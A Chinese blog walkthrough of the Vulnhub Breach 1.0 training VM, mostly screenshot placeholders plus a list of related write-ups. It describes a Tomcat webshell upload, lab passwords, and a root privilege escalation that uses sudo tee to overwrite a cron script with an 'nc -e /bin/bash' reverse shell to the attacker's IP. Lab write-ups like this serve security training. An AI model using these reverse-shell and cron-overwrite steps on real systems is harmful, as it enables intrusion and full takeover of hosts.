breach1.0靶场

最新推荐文章于 2025-09-04 15:57:32 发布
原创 最新推荐文章于 2025-09-04 15:57:32 发布 · 667 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#shell

1.nmap扫描ip靶机端口

在这里插入图片描述在这里插入图片描述
2.进入首页http://192.168.110.140/
在这里插入图片描述
3.查看页面源代码 发现
在这里插入图片描述

两次base64解密<!------pgibbons:damnitfeelgoodtobeaganggoodtobeaganggoodtobeagangta ----->
这个可能是某个地方的账号密码 (先记下来)
4.点击主页图片 再进入
在这里插入图片描述
5.发现一个登陆界面 用刚才的密码登录
在这里插入图片描述
6.点击各个功能点 发现邮件里有一个keystore的文件,点击下载
在这里插入图片描述
7.继续浏览功能点发现一个按钮,点击此链接
在这里插入图片描述
8.发现一个pcap流量包,点击下载 同时观察页面发现重要信息密码都是tomcat
在这里插入图片描述
9.把第一个下载的文件kerstore放到根目录,进入java/jre
将keystore放到C盘根目录,查看keystore这个密钥库里面的所有证书
keytool -list -keystore c:\keystore 输入密钥库口令tomcat:

从密钥库导出.p12证书,将keystore拷贝到keytool目录,导出名为:tomcatkeystore.p12的证书,命令:
keytool -importkeystore -srckeystore c:\keystore -destkeystore c:\tomcatkeystore.p12 -deststoretype PKCS12
-srcalias tomcat

在这里插入图片描述在这里插入图片描述在这里插入图片描述
10.将导出的证书导入wireshare

导入流量包
在这里插入图片描述
在这里插入图片描述

在流量包里找到后台地址
在这里插入图片描述
账号密码流量包
在这里插入图片描述
11.访问后台,解密后得tomcat:Tt\5D8F(#!*u=G)4m7zB
由于该地址的证书不安全,所以需要开启burpsuite,经过代理可以添加安全例外
在这里插入图片描述

传完马的位置 192.168.110.140:8443/压缩包的名字/木马名字.jsp
在这里插入图片描述
发现的问题:上传的菜刀马,一会儿就会消失,文件被删除,需要重新上传war包才能够继续使用菜刀,主机可能有杀软或者杀web shell工具。解决方法:bash反弹一个shell出来。
11.制作msf5马
在这里插入图片描述
配置msf5准备监听

在这里插入图片描述

将木马上传到服务器,访问木马,反弹到shell

在这里插入图片描述

反弹终端
在这里插入图片描述在这里插入图片描述

收集主机信息
在这里插入图片描述
查看用户的密码,发现两个用户
在这里插入图片描述

进入数据库,好像不用密码

在这里插入图片描述

查看数据库中的内容
在这里插入图片描述

得到密码:thelaststraw
登陆用户milton
在这里插入图片描述
在这里插入图片描述
但是有个图片文件,联想到blumbergh用户下应该也有图片
进不去,但是在前面的时候有个gif的图片

在这里插入图片描述

将下载好的图片打包在这里插入图片描述

打印图片中的可打印字符,追加输出到image.txt

在这里插入图片描述

提权成功

在这里插入图片描述

查看历史命令
在这里插入图片描述

查看用户权限
在这里插入图片描述
查看权限发现/usr/share/cleanup/tidyup.sh只有root可写
在这里插入图片描述
可以用root权限运行tee命令
在这里插入图片描述
那么用tee命令写tidyup.sh:先将反弹shell命令写入shell.txt文件,使用bash反弹shell命令没有成功,于是使用nc命令反弹shell成功,所以写nc反弹命令
echo “nc -e /bin/bash 192.168.110.128 8989” > shell.txt
用tee命令将shell.txt内容输出到tidyup.sh
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
查看是够写入成功
cat /usr/share/cleanup/tidyup.sh

开启监听
在这里插入图片描述
成功 用id命令查看权限
用命令python -c 'import pty;pty.spawn("/bin/bash")'得到交互页面
在这里插入图片描述
将图片挪到home目录下
在这里插入图片描述
上传大马
在这里插入图片描述

拿到flag
在这里插入图片描述

Vulnhub之Breach1.0靶场练习
m0_46371267的博客
02-22 4082
靶机信息 下载链接: https://download.vulnhub.com/breach/Breach-1.0.zip 环境配置 1.解压后用vmware打开,这里是我已经安装好的,未安装的只有ova和readme.txt两个文件 Pasted image 20220221090234.png 2.靶机默认使用仅主机模式,ip为192.168.110.140,所以需要将vmnet1的ip设置在192.168.110.0此网段。 Pasted image 20220221090526.png Pasted
VulnHub渗透测试实战靶场 - Breach 1.0
LYJ20010728的博客
08-04 1545
Vulnhub - Breach-1.0环境下载Breach-1.0靶机搭建渗透过程信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Breach-1.0靶机搭建 将下载好的靶机环境,用VMware导入即可使用 VMware虚拟机配置有静态IP地址:192.168.110.140,需要将虚拟机网卡设置为host-only方式 攻击机IP:192.168.110.128 靶机IP:192.168.110.140 渗透过程 信息搜集 使用arp-scan来检测我们的目
靶场-breach1
qq_45751902的博客
10-18 1537
在下载了keystore文件的目录中打开终端,输入命令:keytool -list -keystore keystore,输入口令tomcat,查看keystore密钥库中的证书。将图片下载后利用图片隐写术, strings分析图片,或者exiftool查看(突然发现,那张bill.png(上面有字的)说的话,我理解错了,需要用隐写术)打开bill.png,上面的字让我们看源码(在后面才知道这句话的真正意思),但是这个上面图片的源码都没有内容,想到刚才80端口还有一个图片,这个源码有内容。
Vulnhub靶场Breach1.0
shy的博客
05-19 1080
靶机IP地址发现: 1、arp-scan --interface eth1 192.168.110.1/24 2、 nmap -sP 192.168.110.1/24 3、 fping -a -g 192.168.110.1/24 4、linux:for k in $( seq 1 255);do ping -c 1 192.168.99.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done windows:for /l %i in (1,1,
Vulnhub靶场Breach1.0详解
m0_65712192的博客
02-14 2403
Vulnhub靶场Breach1.0详解
VulnHub breach1.0
jelly
07-12 1126
配置靶机网络 作者提示:The VM is configured with a static IP address (192.168.110.140) so you will need to configure your host-only adaptor to this subnet. 意思是靶机已经配置了静态IP地址为192.168.110.140,所以为了和靶机通行需要把kali主机的网卡设置一下。 这里在virtualbox中可以配置一块新的网卡,为了在同一地址段,设置如下。 ...
【vulnhub】---Breach-1.0靶机
qq_43168364的博客
08-22 1335
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:Breach-1.0靶机(192.168.110.140) 攻击机:kali Linux(192.168.15.129) 物理机IP:192.168.110.220 相关配置 由于该靶机用的是静态的ip,我们要访问的话需要改变主机的IP和他处于同一个网端,为了让物理机还可以访问互联网,我们给物理机添加上两个网卡 这样就OK了 二、信息收集 主机发现 该靶机已知IP地址无需主机发现 端
Vulnhub Breach1.0靶机攻击实战(一)
最新发布
初学者
09-04 687
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。网址:https://www.vulnhub.com靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip。
Vulnhub靶场渗透练习(一) Breach1.0
weixin_30569153的博客
07-06 434
打开靶场 固定ip需要更改虚拟机为仅主机模式192.168.110.140 打开网页http://192.168.110.140/index.html 查看源代码发现可以加密字符串 猜测base64 解密cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh 得到这个结果可能是二次加密在base64解密 得到...
vuluhub靶场实战之breach1.0
wangyanjienice的博客
12-12 1534
环境 kali(攻击):192.168.110.128 breach(靶机):192.168.110.140 0x01 主机发现 netdiscover -i eth0 -r 192.168.110.0/24 Currently scanning: Finished! | Screen View: Unique Hosts
Vulnhub靶场-breach1
qq_43601251的博客
07-13 299
(5)通过测试发现还有一个链接下载的pcap文件,在content目录下。(6)成功解密https流量,并且收集到后台管理系统地址和账号密码。(5)用账号密码登录并查看历史命令发现了blumbergh 账户。(2)在JDK中有可以解密https的工具,利用该工具生成密钥。(5)在Wirshark中打开p12文件解密https流量。(4)查看邮件内容发现下载链接,下载keystore。(1)用wirshark打开pcap文件。(3)查看数据库文件 得到数据库账号密码。(6)下载图片查看隐藏在图片中的密码。
Breach: 1靶场渗透测试
sucker的博客
03-28 1106
7,keystore可以认为是存放秘钥的一个包,需要提供正确的密码才能将包里的秘钥取出来。SSL加密HTTP协议(HTTPS),进行身份认证和数据加解密,没有正确的SSL证书就无法破解http数据包的内容。在 Breach 1.0 中,Burp Suite 的核心作用是通过代理机制突破加密通信限制、提取敏感信息(如认证凭据),并辅助漏洞利用(如文件上传)。的容器文件,常见于软件开发、数据加密和身份认证场景。15,对于定时任务,是可以写脚本进行恶意权限提升的,但是这个文件属于root,无法写入。
【vulnhub靶场Breach1打靶过程记录
didiplus
07-18 1538
Vulnhub是一个提供各种漏洞环境的一个靶场平台,大部分都是虚拟机镜像文件,预先设计各种漏洞需要使用VMware或者VirtualBox运行,每个镜像都有破解的目标,从启动虚拟机到获取系统的root权限和查看flag。.........
【vlunhub靶场打靶记录】breach1打靶
weixin_54603520的博客
05-11 396
breach1打靶记录,难度中上游,主要考验打靶时思维的灵活性以及对渗透过程中不同的方向的广度深度!需要打靶人员能够有较多的渗透经验和较强的变通能力以及比较好的耐心!
breach-1--vulnhub靶场
m0_46982383的博客
08-14 2729
keytool -importkeystore -srckeystore /root/下载/keystore -destkeystore /root/下载/keystore.p12 -deststoretype pkcs12。tidyup.sh这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。访问https://192.168.110.140:8443/getshell/,等几秒,kali获得反弹shell。*u=G)4m7zB。..
breach靶场练习详细全过程
weixin_73562787的博客
07-18 641
1.这次的靶场打的我比较震惊的,长见识了,真的很明显的感受到信息搜索和分析的力量,有种睿智的推理家的感觉了,特别是到后面推测用户blumbergh与bill微妙的关系,以及最后blumbergh的密码是隐藏在bill的图片里,是需要一大段信息的搜索和条理清晰的分析才能得到的推断的,要有耐心,不放过任何一条线索。
vulnhub靶场——BREACH: 1 渗透记录
ShenZ的博客
02-07 1443
BREACH: 1 vulnhub靶场——BREACH: 1 渗透记录 BREACH: 1 一、信息搜集 二、网站渗透 1.流量包 2.tomcat 三、提权 反弹root的shell BREACH: 1 :https://www.vulnhub.com/entry/breach-1,152/ 下载:https://download.vulnhub.com/breach/Breach-1.0.zip Description First in a multi-part series, Breach 1.0
Vulnhub靶场第一关
L1928的博客
08-28 499
Vulnhub靶场 Breach1.0 目标: Boot to root:获得root权限,查看flag。 运行环境: 靶机:网络连接方式设置为主机模式(host-only),静态IP是192.168.110.140。 攻击机:同网段下有Windows攻击机(物理机),IP地址:192.168.110.220,安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Python2.7、JDK、DirBuster、AWVS、Nessus等渗透工具,也可以使用Kali Linux攻击机。 端
into the breach代码
06-19
### 关于《Into the Breach》的游戏代码实现细节 由于《Into the Breach》是一款由 Supergiant Games 开发的策略类游戏,其具体的代码实现细节并未公开。然而,可以从一些相关的开发技术和实践推测其实现方式。以下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值